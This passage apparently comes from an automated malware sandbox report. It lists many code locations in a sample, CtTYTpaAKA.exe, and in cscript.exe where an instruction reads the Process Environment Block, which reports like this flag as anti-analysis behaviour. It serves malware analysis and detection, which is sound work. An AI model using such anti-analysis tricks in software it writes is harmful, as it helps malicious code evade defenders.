          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01075BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01034257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01070EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01070EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01070EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04750050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04750050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04808CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04801074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04757D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04773D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04808D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]
